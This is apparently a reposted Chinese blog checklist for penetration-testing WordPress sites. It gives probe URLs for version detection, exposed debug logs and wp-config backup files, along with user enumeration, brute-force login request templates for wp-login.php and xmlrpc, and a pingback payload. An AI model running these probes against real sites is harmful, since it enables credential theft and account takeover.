干货 | WordPress网站渗透方法指南
2022-9-23 18:14:32 Author: www.secpulse.com(查看原文) 阅读量:41 收藏

如果您遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路?

如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和插件的链接。

或者你可以访问https://target.com/wp-login.php,它是 WordPress 登录管理页面

通过查看核心、插件和主题版本找到相关的CVE

https://target.com/feed 
https://target.com/?feed=rss2
https://target.com/wp-content/plugins/PLUGINNAME/readme.txt 
https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT 
https://target.com/wp-content/plugins/PLUGINNAME/README.txt 
https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
https://target.com/wp-content/themes/THEMENAME/style.css 
https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)

如果您发现过时的核心/插件/主题,请在https://wpscan.com找到漏洞利用

http://target.com/wp-content/debug.log

查找备份文件 wp-config

http://target.com/.wp-config.php.swp 
http://target.com/wp-config.inc 
http://target.com/wp-config.old 
http://target.com/wp-config.txt 
http://target.com/wp-config.html 
http://target.com/wp-config.php.bak 
http://target.com/wp-config.php.dist 
http://target.com/wp-config.php.inc 
http://target.com/wp-config.php.old 
http://target.com/wp-config.php.save 
http://target.com/wp-config.php.swp 
http://target.com/wp-config.php.txt 
http://target.com/wp-config.php.zip 
http://target.com/wp-config.php.html 
http://target.com/wp-config.php~
http://target.com/?author=1

或者

http://target.com/wp-json/wp/v2/users 
http://target.com/?rest_route=/wp/v2/users
POST /wp-login.php HTTP/1.1Host: target.com

log
=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1

或者

POST /xmlrpc.php HTTP/1.1Host: target.com
<?xml version="1.0" encoding="UTF-8"?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>BRUTEFORCE_IN_HERE</value></param> </params> </methodCall>
POST /xmlrpc.php HTTP/1.1Host: target.com
<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://yourip:port</string></value></param><param><value><string>https://target.com></string></value></param></params></methodCall>
http://example.com/wp-login.php?action=register

本文作者:HACK_Learn

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/187638.html


文章来源: https://www.secpulse.com/archives/187638.html
如有侵权请联系:admin#unsafe.sh